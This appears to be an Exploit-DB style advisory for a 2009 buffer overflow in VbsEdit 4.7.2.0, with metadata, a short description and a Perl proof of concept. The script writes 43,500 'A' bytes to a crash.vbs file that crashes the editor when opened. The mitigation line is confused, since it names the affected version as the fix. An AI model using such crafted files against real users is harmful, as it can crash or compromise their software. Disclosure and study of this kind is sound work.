VbsEdit v 4.7.2.0(.vbs) Buffer Overflow Vulnerability

vendor:

VbsEdit

by:

anT!-Tr0J4n

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: VbsEdit

Affected Version From: VbsEdit v 4.7.2.0

Affected Version To: VbsEdit v 4.7.2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:vbsedit:vbsedit:4.7.2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp3

2009

VbsEdit v 4.7.2.0(.vbs) Buffer Overflow Vulnerability

VbsEdit v 4.7.2.0 is vulnerable to a buffer overflow vulnerability when a maliciously crafted .vbs file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a specially crafted .vbs file.

Mitigation:

Upgrade to the latest version of VbsEdit v 4.7.2.0 or later.

Source

Exploit-DB raw data:

#Title: VbsEdit v 4.7.2.0(.vbs) Buffer Overflow Vulnerability

#Author    :   anT!-Tr0J4n

#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

#Greetz    :   Dev-PoinT.com ; GlaDiatOr,SILVER STAR , HoBeeZ, Coffin Of Evil

#special thanks    :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu 

#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com

#Software :  http://www.vbsedit.com

#Tested on:   Windows XP sp3

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#!/usr/bin/perl 
print "| Author: anT!-Tr0J4n      |\n";
print "| Greetz :http://inj3ct0r.com     |\n";
print "|Home : www.Dev-PoinT.com  |\n";

my $junk= "\x41" x 43500 ;
open(file,">crash.vbs");
print file $junk ;
close(file);